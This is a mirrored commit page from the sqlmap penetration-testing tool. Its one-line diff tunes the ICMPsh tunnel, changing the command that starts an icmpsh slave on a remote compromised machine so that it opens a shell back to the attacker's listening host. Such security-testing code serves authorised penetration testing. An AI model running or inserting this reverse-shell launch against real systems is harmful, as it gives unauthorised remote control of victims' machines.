mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-08-04 14:55:40 +00:00
Minor bug fixes and enhancements to ICMPsh tunnel
This commit is contained in:
parent
26cf6c2136
commit
56c16cb471
3 changed files with 22 additions and 7 deletions
|
|
@ -81,7 +81,7 @@ class ICMPsh:
|
|||
infoMsg = "running icmpsh slave remotely"
|
||||
logger.info(infoMsg)
|
||||
|
||||
self.__icmpshSlaveCmd = "%s -t %s" % (self.__icmpslaveRemote, self.lhostStr)
|
||||
self.__icmpshSlaveCmd = "%s -t %s -d 500 -b 30 -s 128" % (self.__icmpslaveRemote, self.lhostStr)
|
||||
|
||||
cmd = "%s &" % self.__icmpshSlaveCmd
|
||||
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue